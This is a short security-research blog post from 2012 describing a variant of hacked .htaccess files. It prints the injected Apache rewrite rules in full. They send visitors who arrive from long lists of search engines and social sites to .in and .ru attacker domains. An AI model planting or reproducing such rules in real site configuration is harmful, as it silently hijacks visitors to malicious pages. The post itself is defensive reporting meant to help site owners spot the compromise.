New .htaccess attacks

Posted on January 19, 2012 by sucuri-research
Seeing some interesting modifications to the old style of .htaccess attacks. The attackers are using a lot of referer domains and using .in domains (along with the .ru). This is an example of the .htaccess hacked:
RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista| msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos| search|metacrawler|bing|dogpile|facebook| twitter|blog|live|myspace|mail|yandex|rambler|ya|aport| linkedin|flickr|nigma|liveinternet|vkontakte| webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km| gigablast|entireweb|amfibi|dmoz|yippy|search| walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut| about|thunderstone|ixquick|terra|lookle| metaeureka|searchspot|slider|topseven|allthesites|libero| clickey|galaxy|brainysearch|pocketflier| verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot |acoon|cyber-content|devaro|fastbot|netzindex| abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv| suchbiene|suchmaschine|web-archiv|web| websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila| sfr|startpagina|kpnvandaag|ilse|wanadoo |telfort|hispavista|passagen|spray|eniro|telia|bluewin| sympatico|nlsearch|atsearch|klammeraffe| sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad| daffodil|click4choice|exalead|findelio| gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido| kingdomseek|mojeek|searchers|simplyhired| splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl| search-belgium|apollo7|bricabrac|findloo|kobala|limier| express|bestireland|browseireland| finditireland|iesearch|ireland-information|kompass| startsiden|confex|finnalle|gulesider|keyweb| finnfirma|kvasir|savio|sol|startsiden|allpages| america|botw|chapu|claymont|clickz|clush| ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$  http://settingappic.in/ecran/index.php [R=301,L] </IfModule>
 
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube| wikipedia|qq|excite|altavista|msn| netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search| metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail| yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
 
RewriteRule ^(.*)$ http://mistyc-faraon.in/mudio/index.php [R=301,L]
 

 
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite| altavista|msn|netscape|a ol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search| metacrawler|bing|dogpile| facebook|twitter|blog|live|myspace|mail|yandex|rambler| ya|aport|linkedin| flickr|nigma|liveinternet|vkontakte|webalta|filesearch| yell|openstat|metabot| nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy| search|walhello|webcrawler |jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone| ixquick|terra|lookle| metaeureka|searchspot|slider|topseven|allthesites|libero| clickey|galaxy| brainysearch|pocketflier|verygoodsearch|bellnet|freenet| fireball|flemiro| suchbot|acoon|cyber-content|devaro|fastbot|netzindex| abacho|allesklar|suchnase| schnellsuche|sharelook| sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://intimgsave.ru/astro/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong| oekoportal|t-online|freenet|arcor|alexana|tiscali| kataweb|orange|voila|sfr| startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista| passagen|spray| eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook| suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice| exalead|findelio|gasta|gimpsy|globalsearchdirectory| hotfrog|jobrapido| kingdomseek|mojeek|searchers|simplyhired|splut| the-arena|thisisouryear| ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium| apollo7|bricabrac| findloo|kobala|limier|express|bestireland| browseireland|finditireland|iesearch| ireland-information|kompass|startsiden| confex|finnalle|gulesider|keyweb|finnfirma| kvasir|savio|sol|startsiden|allpages|america|botw|chapu| claymont|clickz|clush| ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://intimgsave.ru/astro/index.php [R=301,L] </IfModule>

 
If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup
 

This entry was posted in blacklisted, hacked and tagged , . Bookmark the permalink.

Comments are closed.